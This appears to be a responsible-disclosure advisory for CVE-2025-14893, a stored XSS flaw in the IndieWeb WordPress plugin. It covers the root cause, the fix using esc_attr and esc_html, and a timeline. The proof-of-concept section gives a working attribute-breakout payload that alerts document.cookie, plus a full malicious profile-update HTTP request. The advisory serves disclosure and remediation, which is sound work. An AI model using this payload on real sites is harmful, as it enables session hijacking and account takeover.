📄 WordPress IndieWeb 4.0.5 Cross Site Scripting

# CVE-2025-14893: Authenticated Stored Cross-Site Scripting (XSS) in IndieWeb WordPress Plugin
    
    > **Disclaimer:** This repository is created for **educational purposes and ethical disclosure only**. The vulnerability has been responsibly reported to the vendor and patched. Do not use this information to exploit systems without proper authorization.
    
    ## Executive Summary
    A **Stored Cross-Site Scripting (XSS)** vulnerability was discovered in the **IndieWeb** plugin for WordPress (versions <= 4.0.5). This vulnerability allows authenticated attackers with **Author** privileges or higher to inject malicious JavaScript into their user profile's "Telephone" field. 
    
    When the "Author Profile H-Card Widget" is displayed on the frontend, the injected script is rendered without proper sanitization. If a highly privileged user, such as an Administrator, clicks the manipulated link, the script executes in their browser context. This can lead to session hijacking, unauthorized administrative actions, and complete Account Takeover (ATO).
    
    ## Vulnerability Overview
    * **CVE ID:** CVE-2025-14893
    * **Product:** IndieWeb (WordPress Plugin)
    * **Affected Versions:** `<= 4.0.5`
    * **Vulnerability Type:** Stored Cross-Site Scripting (XSS) (CWE-79)
    * **Required Privileges:** Authenticated (Author-level and above)
    
    ## Technical Deep Dive & Root Cause
    The core issue lies in the insecure handling of user metadata within the plugin's templating system, specifically the failure to use WordPress's built-in escaping functions.
    
    **Vulnerable File:** `templates/h-card.php` (Line 27)
    
    ```php
    <a class="p-tel tel" href="tel:<?php echo $user->get( 'tel' ); ?>"><?php echo $user->get( 'tel' ); ?></a>
    ```
    
    **The Flaw:** 
    The plugin directly outputs the user's `tel` metadata inside the `href` HTML attribute using `echo` without wrapping it in `esc_attr()`. This allows an attacker to supply a crafted string that includes a double-quote (`"`) to prematurely close the `href` attribute, followed by arbitrary HTML attributes (such as `style` or `onclick`).
    
    ## Business Impact
    * **Account Takeover (ATO):** If an Administrator interacts with the manipulated element, the attacker's JavaScript can steal session cookies or execute administrative AJAX requests, granting the attacker full control over the WordPress site.
    * **Reputation Damage:** The attacker can modify the visible elements of the page (defacement) or redirect legitimate visitors to malicious third-party websites.
    
    ## Proof of Concept (PoC)
    
    ### Prerequisites
    1. WordPress installed with IndieWeb `<= 4.0.5` activated.
    2. An attacker account with the **Author** role.
    3. The "Author Profile H-Card Widget" added to a visible frontend area (e.g., Sidebar).
    
    ### Exploitation Steps
    1. Log in to the WordPress dashboard as the **Author**.
    2. Navigate to **Profile** (`/wp-admin/profile.php`).
    3. Scroll down to the **Telephone** field.
    4. Inject the following payload (which breaks out of the `href` attribute):
       ```text
       Click_Me" style="background:#ff4444; color:white; padding:5px; display:inline-block;" onclick="alert(document.cookie);
       ```
    5. Click **Update Profile**.
    6. **Crucial Step:** Create and publish a new Post. The vulnerable widget only renders on single post pages (`is_single()`) to display the author's information.
    7. **Trigger:** When an Administrator visits the published post on the frontend and clicks the newly styled "Click_Me" telephone button, the XSS payload (alerting the session cookie) executes.
    
    ### Example Malicious HTTP Request (Profile Update)
    ```http
    POST /wp-admin/profile.php HTTP/1.1
    Host: TARGET
    Content-Type: application/x-www-form-urlencoded
    Cookie: [Author_Session_Cookies]
    
    _wpnonce=[valid_nonce]&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=[nonce]&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=attacker&display_name=attacker&email=attacker%40example.com&tel=Click_Me"%20style%3D"background%3A%23ff4444%3B%20color%3Awhite%3B%20padding%3A5px%3B%20display%3Ainline-block%3B"%20onclick%3D"alert(document.cookie)%3B&action=update&user_id=2&submit=Update+Profile
    ```
    
    ## Remediation
    To patch this vulnerability, the plugin developers must properly escape the output using WordPress's `esc_attr()` and `esc_html()` functions.
    
    **Patched Code Example:**
    ```php
    <a class="p-tel tel" href="tel:<?php echo esc_attr( $user->get( 'tel' ) ); ?>"><?php echo esc_html( $user->get( 'tel' ) ); ?></a>
    ```
    
    ## Timeline
    
    * **Date (2026-03-03):** Reported to Wordfence.
    * **Date (2026-03-20):** Vulnerability patched / Public disclosure.
    
    ## References & Credits
    
    * [Wordfence Vulnerability Database](https://www.wordfence.com/threat-intel/vulnerabilities/id/b29f0fea-a2db-4b2e-b7b8-d15b2395e9e6)
    * [CVE-2025-14893 on NVD](https://www.cve.org/CVERecord?id=CVE-2025-14893)
    * [IndieWeb Plugin on WordPress.org](https://wordpress.org/plugins/indieweb/)